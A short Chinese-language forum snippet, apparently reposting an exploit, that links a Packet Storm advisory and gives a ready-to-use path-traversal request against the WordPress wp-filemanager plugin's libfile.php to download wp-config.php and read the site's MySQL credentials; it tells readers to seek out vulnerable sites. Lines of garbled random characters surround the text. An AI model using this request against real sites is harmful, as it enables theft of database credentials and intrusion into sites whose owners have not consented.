洞详解:http://packetstormsecurity.com/f ... -File-Download.html
0 e- ?; H; z; ^, B1 j/ Z C8 W! @4 |
4 A7 X; F0 p7 d+ p1 U查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。
' ]6 C, ]4 W3 m |